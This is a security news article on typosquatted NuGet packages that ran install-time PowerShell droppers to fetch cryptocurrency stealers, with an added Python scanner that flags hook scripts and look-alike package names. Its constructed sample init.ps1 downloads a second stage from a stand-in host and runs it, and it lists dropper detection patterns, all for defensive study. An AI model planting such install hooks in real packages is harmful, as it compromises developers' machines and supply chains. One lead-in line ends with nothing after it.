Crypto Stealing on its Way: Malicious NuGet Packages to Target .Net Developers

Marrium Akhtar

JFrog security researchers Natan Nehorai and Brian Moussalli have observed an ongoing campaign where threat actors are using typosquatting to impersonate legitimate packages in the NuGet repository, to target and infect .NET developers with cryptocurrency stealers. Within a month, three of these malicious packages have been downloaded over 150,000 times.

“The packages contained a PowerShell script that would execute upon installation and trigger a download of a ‘second stage’ payload, which could be remotely executed,” JFrog researchers Natan Nehorai and Brian Moussalli said.

Malware in vogue

166,000 downloads were attributed solely to three of the most popular packages, namely Coinbase.Core, Anarchy.Wrapper.Net, and DiscordRichPresence.API. However, there is a possibility that the perpetrators artificially inflated the download numbers using bots to make the packages seem more authentic.

The use of the Coinbase and Discord names highlights the continued reliance on typosquatting, in which bogus packages are given names similar to legitimate ones in order to deceive developers into downloading them.

First stage: The malware included in these packages is a dropper script that automatically executes PowerShell code to retrieve a follow-on binary from a server with a hard-coded address.

Second stage: JFrog characterizes the second-stage malware as a “fully customized executable payload,” which can be swapped dynamically because it is fetched from the C2 server at run time.
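The two points above, a package name that mimics a legitimate one and an install-time script that downloads a second stage, are both things a build pipeline can check for before a package is restored. The following Python script is an added example written for this article; it is not JFrog's tooling and not code from the campaign. It inspects a .nupkg (a zip archive) for the hook locations NuGet and MSBuild execute (tools/init.ps1, tools/install.ps1, and build/*.targets or *.props), flags download-and-run indicators in those scripts, and compares a package ID against a constructed allow-list of known names. The sample package, the allow-list, and the host name example.invalid are all constructed for the demonstration.

```python
"""Scan .nupkg files for install-time execution hooks and for package IDs that
resemble known packages.  Added example; not JFrog's or PureVPN's code."""
import io
import re
import zipfile
from difflib import SequenceMatcher

# Archive paths that NuGet / Visual Studio / MSBuild treat as executable hooks:
# PowerShell under tools/, and MSBuild targets/props under build/, which can
# run Exec tasks during restore or build.
HOOK_PATTERNS = [
    re.compile(r"^tools/(init|install|uninstall)\.ps1$", re.I),
    re.compile(r"^build(multitargeting|transitive)?/.*\.(targets|props)$", re.I),
]

# Script content typical of a "fetch a second stage and run it" dropper.
DOWNLOAD_INDICATORS = [
    r"DownloadFile", r"DownloadString", r"Invoke-WebRequest", r"\biwr\b",
    r"Invoke-Expression", r"\biex\b", r"Start-Process", r"Net\.WebClient",
]

# Constructed allow-list standing in for an organisation's approved packages.
KNOWN_PACKAGES = ["Coinbase", "DiscordRichPresence", "Newtonsoft.Json"]


def scan_nupkg(data: bytes) -> dict:
    """Map each hook file found in the package to the indicators it contains."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if any(p.match(name) for p in HOOK_PATTERNS):
                text = z.read(name).decode("utf-8", errors="replace")
                findings[name] = [ind for ind in DOWNLOAD_INDICATORS
                                  if re.search(ind, text, re.I)]
    return findings


def typosquat_candidates(name: str, known_names, threshold: float = 0.8) -> list:
    """Known names that `name` resembles: near-identical spelling ("similar"),
    or a known name reused as a namespace prefix such as Known.Extra ("prefix")."""
    lowered = name.lower()
    hits = []
    for k in known_names:
        kl = k.lower()
        if kl == lowered:
            continue  # exact match is the legitimate package itself
        if lowered.startswith(kl + "."):
            hits.append((k, "prefix"))
        elif SequenceMatcher(None, lowered, kl).ratio() >= threshold:
            hits.append((k, "similar"))
    return hits


def build_sample_nupkg(with_hook: bool = True) -> bytes:
    """Constructed sample package; the hook script mirrors the dropper behaviour
    the article describes (hard-coded server, download, execute)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("Example.Package.nuspec", "<package/>")
        z.writestr("lib/net6.0/Example.Package.dll", b"")
        if with_hook:
            z.writestr("tools/init.ps1",
                       "$c = New-Object Net.WebClient\n"
                       "$c.DownloadFile('http://example.invalid/stage2', \"$env:TEMP\\s.exe\")\n"
                       "Start-Process \"$env:TEMP\\s.exe\"\n")
    return buf.getvalue()


if __name__ == "__main__":
    for hook, hits in scan_nupkg(build_sample_nupkg()).items():
        print(f"hook file {hook}: indicators {hits}")
    for pkg in ["Coinbase.Core", "Newtonsoft.Jsom", "Newtonsoft.Json"]:
        print(pkg, "->", typosquat_candidates(pkg, KNOWN_PACKAGES))
```

A package that trips either check should be quarantined rather than rejected automatically; legitimate packages also ship init.ps1 and build targets, so the hook hit is a reason for review, not proof of malice. NuGet's ID prefix reservation gives publishers a way to claim namespaces, which is what the "prefix" rule approximates locally.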

“.NET developers using NuGet are still at high risk of malicious code infecting their environments and should take caution when curating open-source components for use in their builds – and at every step of the software development lifecycle – to ensure the software supply chain remains secure.”

Keep an eagle’s eye on malicious NuGet packages

According to JFrog researchers:

Ending note: Be on your guard

With malware this widespread, infections are hard to prevent outright. The only way to keep these malicious packages out is to apply safety measures at every step of the software development lifecycle, so that the software supply chain remains secure.
